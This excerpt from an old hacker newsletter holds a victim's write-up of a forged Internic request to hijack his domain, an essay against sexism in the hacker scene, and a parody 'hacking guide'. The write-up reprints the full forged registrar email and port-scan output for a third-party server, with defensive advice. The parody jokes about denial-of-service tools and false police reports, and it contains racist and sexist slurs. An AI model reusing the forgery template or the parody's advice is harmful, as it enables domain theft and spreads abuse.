(*shrug*). I ~ :wrote a brief account of what happened. ~ : ~ : Internic Domain Hijacking - "It Happens" ~ : http://dev.whitehats.com/papers/internic/index.html ~ : ~ :Of course, I have still heard *nothing* from Internic, AOL, or any parties ~ :involved in the attempted hijacking. ~ : A friend of mine had several domains of him stolen the same way, when some freak got access to his mailbox. it took me a week (including messing around that dude boxen) to get all the stuff back. Otherwise it could take months to go into legal trial to return the domain. Network solutions really should have a better clue while dealing with such stuff. -=- KRS: Key R00t Systems IRC: EFnet channel #!krs Founder: Mnemonic (* AOL user) Website(s): http://s-club.4mg.com/ (Now inactive) -=- Details of attack: http://dev.whitehats.com/papers/internic/index.html Internic Domain Hijacking - "It Happens" Max Vision, http://www.maxvision.net/ OVERVIEW This morning I witnessed an attempted takeover of one of my domains, MAXVISION.NET. The attacker, calling themself "Mnemonic of the group KeyRoot", using an AOL.COM address, attempted to spoof a request from me to change the primary and secondary DNS servers for my domain, to Network Solutions / Internic. If successful, this request would effectively give them control of maxvision.net until I could have sorted it out with Internic. Their attempt was foiled for several reasons, which I will outline below. THE ATTACK The attacker sent a forged Domain Modification form to Internic. There were several incompotent errors in the submission that caused the submission to fail. Had these errors not been made, and had I relied on the MAIL-FROM mechanism of Internic, then control of my domain would have been effectively hijacked. Overview of forged email path: The first sign that something was going on was an email from Internic, confirming "my request". Email confirmation "response" from Internic Date: Sun, 2 Jan 2000 17:19:50 -0500 (EST) From: hostmaster@internic.net To: Max Vision Subject: Re: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net This is an automatic reply from Network Solutions to acknowledge that your message has been received. This acknowledgement is NOT a confirmation that your request has been processed. If you need to correspond with us regarding this request, please be sure to reference the tracking number [[NIC-000102.b318]] in the subject of your message. Regards, InterNIC Registration Services ... other standard Internic advertising followed (omited) Moments later I received an error message from Internic (the attacker had made a mistake), which provided me with the evidence I needed to track the offender. Email error "response" from Internic Date: Sun, 2 Jan 2000 17:20:29 -0500 (EST) From: Domain Registration Role Account Reply-To: hostmaster@internic.net To: vision@HUNGRY.COM Subject: Re: [NIC-000102.b318] MAXVISION.NET The Domain Name Registration Agreement below has been returned to you due to the following errors. Please review the Domain Name Registration Agreement instructions available at ftp://www.networksolutions.com/templates/domain-template.txt. The glossary of the parser errors is available at ftp://www.networksolutions.com/templates/domain-parser-errors.txt Network Solutions Registration Services email hostmaster@networksolutions.com dreg08 The attacker had tried to use the same DNS server as primary and secondary ========================================================================= ERROR: duplicate item 8 /<209.210.67.126> Either the hostname or the IP address of a name server matches that of another server in the server list. ========================================================================= The From header was spoofed, the upper case indicates it was copied from my whois record >From vision@HUNGRY.COM Sun Jan 2 17:17:06 2000 >Received: from rs.internic.net (bipmx2.lb.internic.net [192.168.120.15]) > by opsmail.internic.net (8.9.3/8.9.1) with SMTP id RAA28490 > for ; Sun, 2 Jan 2000 17:17:05 -0500 (EST) >Received: (qmail 6410 invoked from network); 2 Jan 2000 22:17:05 -0000 This mail server was used to bounce the message. LAME! See my mailrelay writeup. Note that the attacker used smtp9.gateway.net which seems to forward through an internal "gateway.net" server, thus the 192.168 non-routable address. >Received: from relaye.gateway.net (HELO smtp9.gateway.net) (208.230.117.253) > by 192.168.119.15 with SMTP; 2 Jan 2000 22:17:05 -0000 This indicates the attacker sent "HELO HUNGRY.COM" in their email forgery session however, their true IP is shown as 152.201.160.206 >Received: from HUNGRY.COM (98C9A0CE.ipt.aol.com [152.201.160.206]) > by smtp9.gateway.net (8.9.3/8.9.3) with ESMTP id RAA13460 > for ; Sun, 2 Jan 2000 17:17:03 -0500 (EST) >Message-ID: <386FCEFC.9D64F794@HUNGRY.COM> >Date: Sun, 02 Jan 2000 17:19:40 -0500 >From: Max Vision >Organization: Max Vision They set this as part of their use of gateway.net to forge the email >X-Sender: "Max Vision" (Unverified) If they didn't forge this header, it looks like an outdated Netscape on win98 >X-Mailer: Mozilla 4.06 [en]C-gatewaynet (Win98; I) >MIME-Version: 1.0 >To: hostmaster@networksolutions.com >Subject: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net >Content-Type: text/plain; charset=us-ascii >Content-Transfer-Encoding: 7bit >X-MTS-Ticket: 000102.b318 >X-MTS-Type: Domain >X-MTS-Mode: Modify >X-MTS-Priority: Normal >X-MTS-Status: Open >X-MTS-Timestamp: 000102171706 > > >---------------------------------------------------- >This is the Domain Name Registration Agreement you >recently created. >In order to complete this modification, > >YOU MUST E-MAIL THIS FORM TO: hostmaster@networksolutions.com > >After you e-mail this form, you should receive an auto-reply >with a tracking number. You must use that number in the >Subject of any future messages you send regarding >this registration action. >Once this registration action is completed you will receive >a notification via e-mail. > >**** PLEASE DO NOT REMOVE Version Number or any of the information below >when submitting this template to hostmaster@networksolutions.com. ***** > >Domain Version Number: 5.0 > >********* Email completed agreement to hostmaster@networksolutions.com >********* > > >AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s) >through our online application process or by applying for and registering a >domain name as part of our e-mail template application process or by using >the service(s) provided by Network Solutions under the Service Agreement, >Version 5.0, you acknowledge that you have read and agree to be bound by all >terms and conditions of this Agreement and any pertinent rules or policies >that are or may be published by Network Solutions. > >Please find the Network Solutions Service Agreement, Version 5.0 located >at >the URL href="http://www.networksolutions.com/legal/service-agreement.html">http://www.networksolutions .com/legal/service-agreement.html. > > >[URL ftp://www.networksolutions.com] >[11/99] > >Authorization The attacker used the wrong text here, ignorant switching of "Name" for "New" >0a. (N)ew (M)odify (D)elete.........: M Name Registration >0b. Auth Scheme.....................: MAIL-FROM >0c. Auth Info.......................: > >1. Comments........................: > >2. Complete Domain Name............: maxvision.net > >Organization Using Domain Name Here they retained my old contact info >3a. Organization Name................: Max Vision >3b. Street Address..................: 65 Washington Ave Suite 180 >3c. City............................: Santa Clara >3d. State...........................: CA >3e. Postal Code.....................: 95050 >3f. Country.........................: US > >Administrative Contact and here they tried to make "themself" the admin contact >4a. NIC Handle (if known)...........: >4b. (I)ndividual (R)ole?............: Individual >4c. Name (Last, First)..............: Stakl, Joe >4d. Organization Name...............: Max Vision there is no gGate street in this city, AFAIK >4e. Street Address..................: 1458 Gate St. >4f. City............................: Saint Mary >4g. State...........................: MD >4h. Postal Code.....................: 20618 >4i. Country.........................: USA This number is invalid >4j. Phone Number....................: 401-597-0588 >4k. Fax Number......................: >4l. E-Mailbox.......................: vision@HUNGRY.COM > >Technical Contact Same problems as Admin contact info above >5a. NIC Handle (if known)...........: >5b. (I)ndividual (R)ole?............: Individual >5c. Name(Last, First)...............: Stakl, Joe >5d. Organization Name...............: Max Vision >5e. Street Address..................: 1458 Gate St. >5f. City............................: Saint Mary >5g. State...........................: MD >5h. Postal Code.....................: 20618 >5i. Country.........................: USA >5j. Phone Number....................: 401-597-0588 >5k. Fax Number......................: >5l. E-Mailbox.......................: vision@HUNGRY.COM > >Billing Contact How nice of them, leave me the bill >6a. NIC Handle (if known)...........: MV777 >6b. (I)ndividual (R)ole?............: Individual >6c. Name (Last, First)..............: >6d. Organization Name...............: >6e. Street Address..................: >6f. City............................: >6g. State...........................: >6h. Postal Code.....................: >6i. Country.........................: >6j. Phone Number....................: >6k. Fax Number......................: >6l. E-Mailbox.......................: > These are the nameservers they intended to use in the hijacking The IP addresses resolve to >Prime Name Server >7a. Primary Server Hostname.........: S-CLUB.4MG.COM >7b. Primary Server Netaddress.......: 209.210.67.126 > >Secondary Name Server(s) >8a. Secondary Server Hostname.......: S-CLUB.4MG.COM >8b. Secondary Server Netaddress.....: 209.210.67.126 > > >END OF AGREEMENT > > >For instructions, please refer to: >"http://www.networksolutions.com/help/inst-mod.html" The trail of evidence is overwhelming. Here is the breakdown, then I'll discuss each element: attacker, using an AOL.COM IP address, send forged email using GATEWAY.NET mail relay. This is known to be true, since the networksolutions.com mail server (rs.internic.net) is resistant to TCP spoofing, as is relaye.gateway.net. the AOL.COM address was inactive, so they must have disconnected immediately after sending the forged email (AOL absolutely does not care *at all* about this, and all attempts to reach the abuse or security teams of AOL, Gateway.NET, and Internic have yielded no reply. NO WONDER.) the contact information was all false. The only point of control that the attacker gets is the DNS service. If the attacker intended Denial of Service, then they might not have control of the Linux DNS server. If the attacker intended control of the domain, then they either own/operate the Linux DNS server, or they have rooted the machine. The Linux DNS server is a freeservers.com webhosting server - when the HTTP/1.1 hostname s-club.4mg.com is used, the following webpage appears (indicating that they do have control of the linux server, and that they intended to hijack my domain and Nokia's): Internic's mail server is not vulnerable to TCP spoofing, which indicates that the header information is valid - that a mail really did reach their servers from the relay host, relaye.gateway.net. not spoofed: rs.internic.net rs.internic.net (198.41.0.6) TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!) Sequence numbers: 3763161D 84916A9 979391FC 660A454A 4D3417E0 5DD7DB3B relaye.gateway.net is also not vulnerable to TCP spoofing, which indicates that the header information is valid - that a mail really did reach their servers from the attacker, 98C9A0CE.ipt.aol.com [152.201.160.206]. not spoofed: mail relay host relaye.gateway.net (208.230.117.253): TCP Sequence Prediction: Class=random positive increments Difficulty=50749 (Worthy challenge) Remote operating system guess: BSDI BSD/OS 3.0-3.1 Based on this information, the liklihood of the email being truly forged (at the packet level) are extremely low. This appears to be a straightforward application-level forgery from the AOL account. Having a look at the DNS server that the attacker was trying to substitute for mine, to control the domain, we see it is an older Linux system, that is acting as a virtual webserver. I have contacted that rightful administrators of the system about the attempted attack. overview: substitute dns server FreeServers.com - www26 Server Provo, Utah - USA www26.freeservers.com (209.210.67.126): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 37 open tcp time 80 open tcp http 111 open tcp sunrpc 113 open tcp auth 513 open tcp login 514 open tcp shell 2049 open tcp nfs 3306 open tcp mysql TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!) Remote operating system guess: Linux 2.0.35-37 HOW TO DEFEND YOURSELF Internic offers three authentication methods for domain administrators. MAIL-FROM, CRYPT-PW, and PGP. Each can be used to effectively protect against this type of hijacking effect, each with increasing levels of effectiveness. The following are summaries that discuss how each is used. After each description I'll briefly discuss their vulnerabilities. MAIL-FROM MAIL-FROM is the most basic type of authentication scheme. Under this level of protection, Network Solutions will verify that a Domain Name Registration Agreement, Contact Form or Host Form was submitted from the e-mail address, as listed in our database, of the administrative or technical contact of the record to be changed. MAIL-FROM checks to see that requests to update your contact record -- or any record that you are associated with -- are sent from the current E-mail address of the contact. By default, all the contacts in the database have MAIL-FROM protection unless they have used the Contact Form to associate their contact record with a PGP key or an encrypted password. MAIL-FROM is the default authentication scheme. If you are not sure which of the three options to select, choose MAIL-FROM - it is the default. MAIL-FROM is the default, and weakest security level. Don't follow their advice, use CRYPT-PW at the minimum. CRYPT-PW In the protection hierarchy, encrypted password, or CRYPT-PW, is the next highest level of protection for a domain name registration record. CRYPT-PW allows updates to be submitted from any e-mail address, and, if the correct password is supplied, Network Solutions will process the Domain Name Registration Agreement, Contact Form or Host Form. If you would like to guard your contact record -- and any other database records that you are a contact for -- with a password, enter the plain text of the password in the box below. After you enter the password in the box below it will be encrypted and entered on the form in the correct place. Enter the password a second time to verify that you have entered the plain text of the password correctly. Do not lose this password. Updates to database records may be significantly delayed if this password is lost. CRYPT-PW is a more secure authentication mechanism, as it requires the use of the correct password to effect a domain change. This may be exceedingly difficult to guess, as Internic may have anti-password-guessing measures in place to curb endless "guesses". PGP Pretty Good Privacy provides the highest level of security. PGP is an encryption and digital signature scheme. While 100% security can never be guaranteed, PGP is a very safe scheme. In order to use PGP as your authentication scheme, the PGP software must be installed on your computer. This software is available both commercially and as freeware. If you wish to protect your contact record -- and all records that you are a listed contact for -- with Pretty Good Privacy encryption software, choose this option. IMPORTANT: You must obtain the PGP software and install it on your computer before you can use this security feature. PGP is available commercially and as shareware. To find out more about getting started with PGP, read our help files on how to obtain and install PGP. Your PGP key MUST be added to the Network Solutions' key server before you can use the Contact Form to associate a PGP public key with this contact. Enter the key ID of your PGP public key in the box below. If you have installed the PGP software on your machine but you do not know your key ID, type: pgp -kvc on your local machine to discover the eight digit key ID of your PGP key. IMPORTANT: If you have selected PGP, keep in mind that when the contact template is generated and E-mailed to you, you must FIRST sign the update request with your secret PGP key before sending the contact template to NetworkSsolutions. PGP is the strongest security level, as it is virtually impossible for an attacker to guess the correct private key. PGP is widely held to be one of the more secure/trusted forms of encryption/authentication. There are also settings for "Notification Levels" for updates or usage. If an attacker is aware of this, they can forge the request email, and then forge an additional ACK email. Notification Levels The administrative and technical contact/agent will each choose when they would like to be notified to validate a Domain Name Registration Agreement, Contact Form or Host Form. The options they can choose from are: BEFORE-UPDATE; AFTER-UPDATE; and NOT-CARE. The administrative and technical contacts are not required to choose the same option. Network Solutions will act upon the first reply we receive. If the contact selects BEFORE-UPDATE, Network Solutions will send a confirmation request before any changes are made, even if the request was received from an authorized source. The contact then has the opportunity to acknowledge the validity of the request by replying "ACK" or "YES" to the notification. If the contact does not agree with the change request, replying "NAK" or "NO" to the notification will prevent any changes from being made. Selecting BEFORE-UPDATE may delay legitimate changes while Network Solutions waits for approval to make the requested change. If the contact selects AFTER-UPDATE, Network Solutions will send a confirmation request after changes have been made. Even if AFTER-UPDATE is the selected level of protection, Network Solutions will only process a Domain Name Registration Agreement, Contact Form or Host Form if it was received from an authorized source, or if the registrant gives its express written permission to make the requested change. Both the administrative and technical contacts have the opportunity to acknowledge the validity of the request by replying "ACK" or "YES" to the notification. If either one of the contacts does not agree with the change request, replying "NAK" or "NO" to the notification will usually reverse any changes that were made. AFTER-UPDATE is the default option if no other type of notification is selected. If the contact selects NOT-CARE, Network Solutions will never send a confirmation to that contact. By choosing this option, the contact establishes that they are not concerned about whether or not authorized changes are made to any domain name registration, contact record or host record with which he is associated. As stated above, MAIL-FROM is not really enhanced with the BEFORE-UPDATE feature, as an attacker could forge a corresponding ACK message. CONCLUSION There are some serious security issues with the current Internic Guardian system. Domain Hijacking is as easy as ever, and many newbie crackers have been actively using this attack to hijack websites addresses. Over the Y2K weekend it was rumored that several large sites suffered from this attack. If you are a domain contact and have not set encryption authentication options such as CRYPT-PW or PGP, then DO SO NOW! Max Vision @HWA 56.0 "A well known but overlooked threat to Hackers: Themselves" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hackernews.com/bufferoverflow/00/threat.html In response to "Scene Whores" HNN buffer overflow article: A Well Known But Overlooked Threat to Hackers: Themselves By: Carole Fennelly The recent HNN article "Scene Whores" by Erik Parker was advertised as "controversial". There is a fine difference between "controversy" and "shock tactics". The first is intended to provoke discussion to reveal opposing sides of an issue. The second is intended to provoke outrage for the purposes of cheap publicity. I work in a city that is home to more radio "Shock Jocks" than any other. I am, unfortunately, well aware of the dangers of falling into the trap of responding to such tactics. For any who really believe the emotional and sexist ramblings of that article: no one will change your mind - and that is, indeed, unfortunate. For the others who just view it as harmless babble, I intend to prove that it is, indeed, harmful. The article promises to reveal an overlooked threat to hackers. It delivers nothing more than the emotional outburst of someone who was jilted. It should probably be simply dismissed for the immature rambling that it is. I cannot do so. Not because I am a woman - because I am a security professional who will not let pass an article that endorses FUD (Fear, Uncertainty and Doubt). This may not have been the intent, but it was the result. In this article, Mr. Parker comes to the conclusion that Scene Whores are female and hackers are male: "I will always refer to woman as the scene whores, and use 'she' when speaking about scene whores. The reasoning behind this is, the majority of hackers are men. One passage brought to mind a scene in Dr. Strangelove where the general warns that women steal "our precious bodily fluids": " They are a real threat. They waste our time, ruin friendships, cause chaos between hackers, and generally ruin periods of our life" What the article succeeded in doing was to reinforce the stereotype that women have only one purpose in the technical world - sex. Further, it supports the medieval belief that women are evil and must be kept in their place: "Hopefully we can start identifying scene whores quicker, and securing ourselves against them quicker, and put them out of commission." I guess the next Defcon Event will be The Scene Whore Trials.. followed by burning them at the stake. Since the only method suggested to determine who these evil Scene Whores are is one of gender, all women must be guilty: "Now the hard part is.. To determine which ones aren't scene whores. The ones who have been with other hackers, but are true and honest, and like you for who you are. I can't say the best way to determine this. I think it is easier to just try and detect the scene whores, and eliminate them, than to try and find a way to detect non-scene whores, if that makes any sense to you. " No, it does not make sense.. Hackers were not let off the hook of stereotyping either and the image of the "drugged out hacker" was also reinforced - along with gratuitous ego-feeding: "We are a rare species I suppose, we are in an age where we wear what we want, we don't necessarily need a college background, we are making 6 digit figures, and setting the rules for our selves. Anyway you look at it, scene whores can look and think that we have power, money, and we are the stereo typed "cool". Some of us are all of the above, and into drugs, and many girls find drugs to be an attractive feature." The problems of stereotyping The hacker community should be well aware of the handicap of a stereotyped image. A parody of this is on 2600: http://www.2600.com/hacked_pages/prop/prop_pages /2600/hax0r.html Of particular interest is: "Also, all hax0rs are racist, sexist, apocolyptic bastards, so support your local redneck crackhead klan or whatever you call the kkk. Never ever forget to refer to women as pussy and remember you can buy love (ie prostitution; because sex and love are exactly the same thing." Several pioneers in the hacking community are to be commended for their efforts in overcoming these stereotypes. Most notably, the L0pht has had zero tolerance for the media portraying hackers as malevolent criminals intent on destroying computer systems. How did this stereotype come to exist in the first place? The simple truth is hard to swallow: there were (and still are!) hackers who destroy systems. In an effort to make a distinction between criminal hackers and "harmless" hackers, all sorts of euphemisms were employed like "white hat hackers" and "black hat hackers". Today, the politcally correct term for criminal hackers is "crackers". It seems that whenever an undesireable group tarnishes the name of "hackers", a new term is invented. A prime example of this is the recent CDUniverse extortion story. http://www.wired.com/news/technology/ 0,1282,33563-2,00.html http://www.zdnet.com/zdnn/stories/news/0,4586, 2420863,00.html?chkpt=zdnntop In the above articles the point is made that the extortionist is not a "hacker". He's a "Data thief", "intruder", "extortionist" or "cracker" - anything but a hacker. I'm sorry, but like it or not, he's a hacker. He may also be a crook, but he used computer skills to bypass a system's security. The fact that he used the results to commit a crime is separate, but doesn't change the fact that he's a hacker. As a woman in technology, I don't have the luxury of claiming that women who behave badly are not women. I can't deny that they are women. What I can do is distinguish what they are from what they've done and treat them as the separate issues that they are. When you identify distasteful actions as being taken by "women", we are all tarred with the action - and all have to suffer the consequences. This is why I must object to the simplistic characterization of "scene whores" as women and "hackers" as men. To understand the term "Scene Whore", let's separate the components of the term. Whore The term "whore" is defined by Webster's dictionary to mean "a woman who practices promiscuous sexual intercourse esp. for hire: PROSTITUTE The term "prostitute" has several definitions. The one that I think best fits is "a person who deliberately debases himself or his talents (as for money)" The hacker community has labeled J.P. Vranesevich of AntiOnline a "scene whore" because it is felt that he sold out the hacker community for the sake of corporate backing. True or not, this attitude demonstrates that the hacker community defines a "scene whore" as a person who debases themselves for profit - not simply a person who has sex. The Hacker Scene The "scene" does indeed appear to be sexist - why else would there be a "Babes of Defcon" contest? http://www.01grafx.com/html/babesofdefcon7.html I cannot comment with authority on the hacker "scene" since I've never attended Defcon (specifically because of the atmosphere). Perhaps that is why it was so unfathomable to me why women at the Chaos Computer Club required their own "hacking room" ( http://www.wired.com/news/women/0,1540,33346,00.html). Why would they choose to segregate themselves from the other hackers? Perhaps they sought an atmosphere where they would not be considered "meat". I do recall how difficult it was in 1980 to be the only female in many of my classes at Polytech (and the rumours that I slept with everybody). Still, I would not like to attend a conference that would exclude my male friends. A Well Known But Overlooked Threat to Hackers: Themselves In the U.S., we have been conditioned to believe that we are not responsible for our actions. This is wrong. You are responsible for your own indiscretions and must suffer the consequences of your actions. This has nothing to do with "hacking" or gender or even age. We have had a clear demonstration of faulty judgement in President Clinton. Shouldn't a man who was a Rhodes scholar have known better than to seek cheap gratification with an intern? While she was portrayed as the "temptress", he can hardly cry "rape". It is insulting to men to suggest that they cannot show some self control. If a hacker cannot show the self control to be wary of who they get romantically involved with - male or female - they deserve to suffer the consequences of their actions. When a person claiming to be a hacker makes absurd statements, the reputation of all hackers is tarnished. Carole Fennelly Partner Wizard's Keys Corp. Security Columnist Sunworld Magazine fennelly@wkeys.com @HWA 57.0 The complete guide to hax0ring. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (As mentioned in previous HNN buffer overflow article) http://www.2600.com/hacked_pages/prop/prop_pages/2600/hax0r.html Here it is, kids. The famed "Complete Guide to Hax0ring". Read it. Live it. Love it. Picking a handle By: DRiVE In the famous words of joey " i need a handle ". This is true. Every great hax0r has a 31337 handle. I am going to help you pick the best one. STEP ONE: find a handle that at least 70 other people have such as acid , demon , rave ,and thug. STEP TWO: if you cant find one that alot of people have just make sure yours has alot of x's in it. That way people will really ph33r you . I mean everyone knows that people with x's in their handles are the best at hax0ring gibsons, this is because when you log into a gibson it messes it up because UNIX for Win95 wasnt made to recognize x's. So dont have something that makes sense , instead of something like DOC try Xdocx or xDxOxCx. This will let people know you are 31137. STEP THREE: Make it scary. Not something simple that describes you or anything about you but something nasty like hellgod or deathbringer , you know just so people will think you are l<00L. STEP FOUR: Join a warez group or if you want to be really 31337 start your own i suggest the name W.M.A this stands for WaReZ MoBsTaS of AmErIcA ....this way everyone will know you listen to tupac and you are really in a gang and that if " Da TaLk SuM mO sHizNiT YoU Is gOnNa CoMe To Da HoUsE" then always ask for their address this will make them think you are going to come and shoot them. Anyways after you start you group make a rad ass tag to put on all your warez. Then send it out and this way people will know you are elite. I recomend sending a mass mail to tosemail1 , this waaay tosemail1 will tell all the guides not to fuck with you because you have a kick ass punter. STEP FIVE: after you have a cool ass handle go into all the 2600 newsgroups and post alot of messages asking for loops and how to jackpot atms this way people will know what you are talking about. STEP SIX: now you have all the respect you could ever want just go into phreak and tell them you and your boyz can sk00L them. Section 1: Getting Online By: Orin To get online from your house, you must first own a computer. You can find these at Garage Sales, Electronics Catalogs, or your friendly Radio Shack. Make sure to make it clear to the person you are purchasing the computer from that you are using it for hacking intentions. Once you have acquired a computer, check and see if it has a modem. A modem could be a small box with lights on it, and an outlet for a telefone jack, or a large telefone reciever on the back of your computer...Be careful, this fone may _only_ be used for calling other computers, and never for personal calls! Usually these fones are monitored by the police, so it would probably be your best bet to get an external modem, as there is no way the cops could listen in on an extension. Once you know you have a modem, you're close on your way to becoming a real hacker. The next thing you should do is get an account on America Online immediately; this is the hacker's playground, and you will meet many intelligent people there. To do this, it takes a little thinking. You should first get some AOL software. This is accomplished by going up to your friendly mailman and asking him for a complimentary AOL installation disk. The government gives mailmen these disks to pass out free to the public. Usually, the mailman will give you a short tutorial on the installation process (its widely known in the computer community that mailmen make the best hackers). After you have created your AOL account, it is important to think of a good Screen Name (see appendix for some suggestions). Now, you are almost there! Section 2: Looking Cool By Orin The most important thing about hacking is looking cool. If you look cool, people like you, and if people like you, you can fool them into letting you hax0r them. If they don't think you look cool, they're probably lamers anyway. Looking cool is accomplished by having a bad-ass attitude, and unique personal qualities like being a raver or a druggie. For instance, most people will think you are cool if you tell them you are female. They'll also think you're cool if you can make them ph33r you. But, the art of ph33r will come in later chapters, as it is an advanced hacking skill. Right now, just follow this simple rule of thumb for looking cool: Never talk about computers, and always throw in capital letters and numbers while typing. Oh and not to mention, in order to be a l33t0 hax0r j00 must be arrested at least several times, since being arrested can sometimes prove to be difficult. Try these methods. I. Pranking the FBI ahh yes a personal favorite of mine, pranking the FBI always a fun past time especially since they can't trace it or nothing. II. Hax0ring your way into ATM's Take a mini computer ( a name I do not know ) and attach it to the ATM (a method I do not know). You get this mini computer through the blackmarket. Then the way everything works is I don't know, but I sure got caught and I sure stole $ 4,000 and AND the authorities sure THREATENED me with computer probation *gasp*. I did it so long ago I don't remember the rest. If you don't believe me just ask DCY he knows everything because after all he is a 13 year old 7'2" hacker!!! III. Calling the police Now call the police and tell them you know about a drug dealing mafia super villian type that lives next door, then give them your address but make absoluely certain you have enough proof of your evil schemes, such as a to do list like so 1. Do dishes 2. Clean living room 3. Pick up groceries 4. Take over the world 5. Baby sit the neighbors kid 6. Torture neighbors kid 7. Kill neighbors kid 8. Hide neighbors kids body etc... etc... Also make sure to have plenty of your mind expanding drugs and such lying around so if all else fails they'll make sure to arrest you over these. On the off chance they refuse to, scream things like "Hack the Planet" and "Roswell! Where its at !!" Don't worry about making any sense, real hax0rs don't make sence and babble incoherently for hours on end (similar to the Unabomber's manifesto). Now that you have acheived l33tness by being arrested, you can brag about how you got arested and how the CIA, FBI, and PLO are after you (its common knowledge that the palastinian liberation organization have a great interest in bringing computer hax0rs to justice so they can cut your hands off thus denying you the ability to type well with your fingers at least which is why we included a guide to typing with your toes on the off chance you have already been captured by the PLO). Never ever forget to take pride in hax0ring the FBI and CIA with Fate X 9123213; this is very l33t and you should never hesitate to brag about your acomplishments. If somene says they do not believe you, hax0r there ass by punting them (covered more theroughly later on). Other ways to look |< |2 /\ [) include scrolling, mass mailings, punting, and lets not forget the power of ph33r, if you threaten to turn off everyones fone, cable, power, etc, they will ph33r you. When you say this, everyone will always take you seriously and will go out on there porch and sit in the rocking chair cradling there shotguns and drinking Jack Daniels waiting for you. Also, all hax0rs are racist, sexist, apocolyptic bastards, so support your local redneck crackhead klan or whatever you call the kkk. Never ever forget to refer to women as pussy and remember you can buy love (ie prostitution; because sex and love are exactly the same thing. Now, I may sound like I am being sarcastic but I assure you I am not, if you have any doubts in my l33tness ask CDJ he is very smart. (that left a bad taste in my mouth) The last way to look cool (and these are the only ways) is to claim your down with Kevin Mitnick, the mentor, or are a part of LOD. This contributes to how much people will ph33r you, but if they ask you any questions about them, either ignore them or be exceptionally vague becuase otherwise they won't take you serious, becuase real hax0rs never have facts they just say stuff like "Me and Kevin Mitnick are best friends, we hax0r Gibsons together". This will impress everyone and give you instant coolness, l33tness, and most importantly, make you look cool. Section 3: The art of ph33r by DoomBug Making People ph33r you doesn't come naturally. There is actually an art to it. To make people ph33r you, you MUST have a leeto burrito screen name first of all. (see appendix for some suggestions). Second you MUST ask question like "R there any good hax0rs here?!? Gimme a good Nua dial-up for Unix if u dare". Now that one is a MUST. Third, you will have to talk shit about people that call you a warez pup; when they do it, say something like "j0e m0mma!" then they will ph33r you also. Another helpful way to make people ph33r is getting out Fate X 99 1/2 and hax0ring away at AOL and hax0r chat rooms. Call people lame too.... See that wasn't hard at all, and people all ph33r you now. And NEVER EVER think you own sp0ck; ph33r sp0ck cause he owns YOU. Section 4: The art of "fucking" by Cirrus First, you must learn what you are trying to accomplish. If you have intentions to steal, break, or destroy, read no further. You can easily take over someones computer, (Well, ok, this is destructive) by obtaining thier IP address. Say, they are setting up an FTP server, or, just get them to tell you what it is. Now, you must get some kind of a program, and Ping them, to find out if the are lagging or not. Now, ( if they have an FTP ) you can kill there FTP by using a port fucker. Put it to "fuck" port 21 . If they don't have one, obtain a program called "WinNewk". That will just shut down thier computer to say the least, but, I will not get into how it works this time. You can also use a pinger, and ping the hell out of them, which can sometimes have the effect of a Nuke. Next time I will teach you how to clone a cellular fone with a pixy stick. Have fun!.. oh yeah, if I find out you were doing this shit to hurt something other than a Computer/Server/Host, like a teacher, or an old friend with a new PC, I will fucking beat your ass. Section 5: Advanced AOL Hacking Techniques by IMP After you have mastered basic |-|4><0|2ing skillz, you can move on to advanced methods. The first thing ya gots ta do to be a master |-|4><0|2 d00d is to go into a W4R3Z room and spend a minimum of 4238923487 hours a week in there until you have every version of Fate available, plus 9 or more gigs of pirated software. Now go into private room "Phreak" and offer to trade your W4R3Z for other W4R3Z. It's very 1337 to assume that people will ignore you when you only say it once, so a true |-|4><0|2 will scroll it about 13 times, and as you should know by now, all in caps or LeeT0 WaReZ FoNT. If 3 seconds go by and no one's responded in a positive manner yet, scroll it again, only this time try 2 dozen times to make sure you get your point across. And a true |-|4><0|2 always uses mucho punctuation. (ie: ANYONE WANNA TRADE QUACKE FOR DUCK NUKKEM?!??!?!?!?!!?!!) Now, often times if one of the lamerz who hang out in that room and ruin its general 1337ness happen to be there, they'll try to say some bullshit like "This isn't a warez room." Well, don't listen to them, use one of your many /<-Rad punters and show them who's 1337. Make sure you advertise the punter 10 or 20 times before actually trying to punt them, this way you'll make them scared and they'll probably apologize and stuff, which will make everyone else ph33r you. (See section 3) Occassionally when you try to punt them, you get an error message that says their ims are off. No one is sure why this happens, it's probably something wrong with aol. Maybe they'll fix it in the next version, or maybe they're too lame to have ims!!!!!!!!!!!!!!!!!!!! ROFLMFOAJFHJLOLOLOLQWXMIDHENDIHAMEHIDNDFIWQNXDKCHAIRDQWDHADSHCSALFWQLHQHDF JWFILFWJIFSDHHLOLDFSHIWEF!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! OK, but seriously, if your first punter doesn't w3rk, try 7 or 8 of your other punters. If it still doesn't work, just make fun of their mom and say they're gay! Section 6: Phreaking This section is on phreaking. Now, phreaking is fone hax0ring, and the first thing you must learn to be a l33t0 phreaker is to substitute all f's with ph's and all ph's with f's; until you have mastered this skill you are just another lamer (like joey unless you do a righteous hack remember), also to be a super duper phreaker you need some of the legendary colored boxes. To build these boxes you need the following parts Red Box- a box, red spray paint Blue Box- a box, blue spray paint Beige Box- a box, Beige spray paint Now since these boxes ar so insanely difficult to construct we will take a break so we can use our drugs and be a cool raver type. Becuase remember, all supreme hax0rs are raver druggie types. its common knowledge. duh. Section 7: Hacking with Fate™ by Fluxxie Now this is the leetest stage there is. because Fate™ it the leetsest prog there is, a true foundation to the hacker community. There are many versions of Fate™, but its always good to have all the versions. (Little do people know, when you compile all the different source codes of Fate™ you have the security information to hack a Gibson, very very 31337.) To get Fate™ go into a hacker private room, something like MM or even Fate™ (yes thats right, Fate™ even has its own room!) and start scrolling your request. People will be obliged to help such a worthy cause. Now that you have obtained Fate™ you have to get a dial up, something like the FBI. You can find these number listed in your local phone book. After you call them you may get what sounds like someone talking through your modem speaker. This is one of their secret tatics to make you think that you got a wrong fone number. Once this has happened you have made contact, remember this is an important part, so keep calling back. Now the connection has been made start pushing all the buttons on the Fate™ screen. This may look like its not doing anything, but thats only the hidden screen so that nobody can see what you really doing. Which means its great to use this in school, or other open places. Now that the steps have been completed get back on Amercia Online and tell 